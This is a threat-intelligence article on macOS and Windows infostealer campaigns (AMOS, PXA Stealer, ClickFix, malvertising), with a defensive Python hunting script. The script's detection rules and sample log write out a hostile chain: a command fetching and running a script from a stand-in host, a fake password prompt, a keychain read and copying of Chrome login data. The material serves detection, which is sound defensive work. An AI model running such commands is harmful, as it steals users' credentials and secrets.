
macOS Python Infostealers

Cybersecurity specialists are raising alarms over a rapid expansion of information-stealing attacks beyond Microsoft Windows into Apple macOS ecosystems. Threat actors are increasingly relying on cross-platform languages such as Python and abusing trusted services and advertising platforms to distribute malware at scale, significantly broadening the attack surface.

Social Engineering Fuels macOS Infostealer Campaigns

Since late 2025, multiple campaigns have targeted macOS users through social engineering techniques, most notably ClickFix. These operations distribute malicious disk image (DMG) installers that deploy well-known macOS infostealer families, including Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. Delivery hinges on convincing the user to open the installer or paste a command into Terminal, so the initial execution is user-initiated rather than the result of an exploit.

Native macOS Abuse and Stealthy Data Theft

Once executed, these threats frequently rely on fileless techniques, native macOS utilities, and AppleScript automation to evade detection and streamline data collection. Stolen information commonly includes browser-stored credentials and session data, sensitive entries from the iCloud Keychain, and developer-related secrets that can enable further compromise.

Malvertising as the Initial Access Vector

Many of these attack chains begin with malicious advertisements, frequently delivered through Google Ads. Users searching for legitimate software, such as DynamicLake utilities or artificial intelligence tools, are redirected to spoofed websites. These sites employ ClickFix lures that instruct victims to follow copy-paste commands or installer prompts, resulting in self-inflicted malware deployment.

Python Stealers Enable Rapid Adaptation

Python-based infostealers are particularly attractive to attackers due to their flexibility and ease of reuse across different operating systems. These threats are commonly distributed via phishing emails and are designed to harvest a wide range of sensitive assets, including:

  • Login credentials, session cookies, and authentication tokens
  • Credit card details
  • Cryptocurrency wallet data

PXA Stealer and Messaging App Abuse

One notable example is PXA Stealer, attributed to Vietnamese-speaking threat actors. Documented campaigns from October and December 2025 relied on phishing emails for initial access and leveraged Windows registry Run keys or scheduled tasks to maintain persistence. Telegram was used for command-and-control communications and data exfiltration. Separately, threat actors have also weaponized popular messaging platforms such as WhatsApp to distribute malware like Eternidade Stealer, targeting financial and cryptocurrency accounts, a campaign publicly disclosed in November 2025.

SEO Poisoning and Fake Software on Windows

Infostealer activity is not limited to macOS. Parallel campaigns have used fake PDF editors, such as Crystal PDF, promoted through malvertising and search engine optimization poisoning. These Windows-focused attacks deploy credential stealers capable of silently extracting cookies, session information, and cached credentials from Mozilla Firefox and Google Chrome.

Defensive Measures Against Infostealer Operations

To reduce exposure to infostealer threats, organizations are encouraged to implement layered defenses and user awareness initiatives, including:

  • Training users to recognize malvertising redirect chains, fraudulent installers, and ClickFix-style prompts
  • Monitoring for unusual Terminal activity, unauthorized access to the iCloud Keychain, and suspicious outbound POST requests to newly registered or anomalous domains
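The monitoring points above, together with the native-utility tradecraft described under "Native macOS Abuse and Stealthy Data Theft", are easiest to turn into something actionable as a scoring rule over process telemetry: any single hit (a developer running curl | sh, a script reading a keychain item) is noisy, but a chain of distinct behaviours from one user inside a short window, starting from an interactive terminal, is the ClickFix pattern. The Python below is an added example written for this page, not code from the article or from any vendor; the log line format, field names, rule set, scoring weights, threshold, and sample events are all constructed assumptions to be mapped onto whatever your EDR or unified-log pipeline actually emits.

```python
"""Hunting heuristics for ClickFix-style macOS infostealer execution chains.

Added example (not from the original article). Input is a constructed,
simplified process-telemetry log, one event per line:

    <ISO-8601 timestamp> user=<name> parent=<parent process> cmd="<command line>"
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional

# Rule name -> regex over the command line. Rules key on the native utilities
# the article names (curl|sh, osascript, security, xattr) and on the browser
# and keychain artefacts these stealers collect. Patterns are assumptions.
RULES = {
    "curl_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64_decoded_to_shell": re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "osascript_password_prompt": re.compile(r"\bosascript\b.*(with hidden answer|administrator privileges)"),
    "quarantine_attr_removed": re.compile(r"\bxattr\b.*(-c\b|-d\s+com\.apple\.quarantine)"),
    "keychain_read": re.compile(r"\bsecurity\b.*\b(dump-keychain|find-(generic|internet)-password)\b"),
    "browser_secret_path": re.compile(r"Application Support/Google/Chrome|Firefox/Profiles|logins\.json|Login Data"),
}
# A pasted ClickFix one-liner lands in a shell whose parent is a terminal app.
TERMINAL_PARENTS = {"Terminal", "iTerm2"}

EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd="(?P<cmd>.*)"$'
)

@dataclass
class Event:
    ts: datetime
    user: str
    parent: str
    cmd: str
    rules: List[str] = field(default_factory=list)  # rules this command matched

@dataclass
class Session:
    """Matched events from one user, close enough in time to be one chain."""
    user: str
    events: List[Event]

    @property
    def rules(self) -> List[str]:
        return sorted({r for e in self.events for r in e.rules})

    @property
    def score(self) -> int:
        # One point per *distinct* behaviour in the session, plus one if any
        # step was launched from an interactive terminal (a pasted command).
        interactive = any(e.parent in TERMINAL_PARENTS for e in self.events)
        return len(self.rules) + (1 if interactive else 0)

def parse_event(line: str) -> Optional[Event]:
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return Event(ts, m["user"], m["parent"], m["cmd"])

def scan(lines) -> List[Event]:
    """Events that matched at least one rule, in log order."""
    out = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ev.rules = [name for name, rx in RULES.items() if rx.search(ev.cmd)]
        if ev.rules:
            out.append(ev)
    return out

def sessions(events: List[Event], window_s: int = 300) -> List[Session]:
    """Group matched events per user; a gap above window_s starts a new session."""
    groups: List[Session] = []
    for ev in sorted(events, key=lambda e: (e.user, e.ts)):
        cur = groups[-1] if groups else None
        if cur and cur.user == ev.user and (ev.ts - cur.events[-1].ts).total_seconds() <= window_s:
            cur.events.append(ev)
        else:
            groups.append(Session(ev.user, [ev]))
    return groups

def triage(lines, threshold: int = 3) -> List[Session]:
    """Sessions at or above the threshold, highest score first."""
    return sorted((s for s in sessions(scan(lines)) if s.score >= threshold),
                  key=lambda s: s.score, reverse=True)

# Constructed sample telemetry: alice pastes a ClickFix one-liner that stages a
# second-stage script, prompts for her password, reads the keychain and Chrome
# logins, and strips quarantine; bob and charlie are ordinary developers.
SAMPLE_LOG = [
    '2025-12-02T10:14:03Z user=alice parent=Terminal cmd="echo Y3VybCAuLi4= | base64 -d | sh"',
    '2025-12-02T10:14:05Z user=alice parent=sh cmd="curl -fsSL https://update.example/s.sh | bash"',
    '2025-12-02T10:14:07Z user=alice parent=bash cmd="osascript -e \'display dialog "Enter password" default answer "" with hidden answer\'"',
    '2025-12-02T10:14:09Z user=alice parent=bash cmd="security find-generic-password -wa alice"',
    '2025-12-02T10:14:10Z user=alice parent=bash cmd="cp /Users/alice/Library/Application Support/Google/Chrome/Default/Login Data /tmp/ld"',
    '2025-12-02T10:14:12Z user=alice parent=bash cmd="xattr -c /tmp/Installer.app"',
    '2025-12-02T11:02:44Z user=bob parent=Terminal cmd="git pull --rebase"',
    '2025-12-02T11:03:10Z user=bob parent=Terminal cmd="curl -sS https://api.example.internal/health"',
    '2025-12-02T15:40:00Z user=charlie parent=Terminal cmd="curl -fsSL https://get.example.dev/install.sh | sh"',
    'not a telemetry line',
]

if __name__ == "__main__":
    for s in triage(SAMPLE_LOG):
        print(f"score={s.score} user={s.user} rules={s.rules}")
        for e in s.events:
            print(f"  {e.ts.isoformat()} parent={e.parent} {e.cmd}")
```

On the sample data only alice's session crosses the threshold (six distinct behaviours plus the Terminal origin); charlie's lone curl | sh installer scores 2 and stays below it, which is the point of scoring the chain rather than the individual command. In production the same grouping key should be the terminal session or process tree rather than the user name, and the rule table should be extended with the specific paths and binaries your telemetry shows for AMOS, MacSync and DigitStealer rather than the generic ones assumed here.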

Business Impact of Infostealer Compromise

Successful infostealer infections can have far-reaching consequences. Stolen credentials and session data may enable data breaches, unauthorized access to internal systems, business email compromise, supply chain intrusions, and follow-on attacks such as ransomware deployments. Proactive detection and education remain critical to limiting these risks.
